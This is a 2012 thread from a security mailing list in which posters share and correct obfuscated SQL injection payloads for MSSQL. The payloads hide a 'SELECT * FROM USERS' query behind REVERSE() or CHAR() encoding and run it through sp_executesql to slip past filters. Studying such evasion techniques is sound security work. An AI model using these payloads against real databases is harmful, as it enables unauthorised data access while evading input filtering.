Hi Robin, You are 100pc correct. The script is generating a + after the first = I will fix this later tonight.
Corrected syntax --Select * From Users DECLARE @myvar nchar(50)= CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+ CHAR(67)+ CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+ CHAR(111)+ CHAR(109)+ CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+ CHAR(83); exec sp_executesql @myvar Apologies for the confusion. Regards, Pat On Fri, Jun 8, 2012 at 6:37 PM, Robin Wood <[email protected]> wrote: > On 8 June 2012 03:43, Pat <[email protected]> wrote: > > Hi all, > > > > I came from a developer background and found myself in > business development > > so in order to get my nerd on I started a blog as I do have the odd > brain > > fart. > > > > Thought id share one of my favourites as I have seen a few posts out > there > > saying obfuscation of SQL injection is not possible... > > > > > > Example 1 > > --MSSQL > > > > --SELECT * FROM USERS; > > > > 'DECLARE @myvar nchar(50)= REVERSE(';sresu morf * tceles'); exec > > sp_executesql @myvar ;-- > > > > Example 2 > > --MSSQL > > > > --SELECT * FROM USERS; > > > > DECLARE @myvar nchar(50)= + CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+ > > CHAR(67)+ CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+ > > CHAR(111)+ CHAR(109)+ CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+ > > CHAR(83); exec sp_executesql @myvar > > Is there a rogue + after the = in this example? > > Robin > > > For a script to generate example 2 see > > http://stolenpackets.net/?p=11 > > > > > > > > Regards, > > Pat > > > > _______________________________________________ > > Pauldotcom mailing list > > [email protected] > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
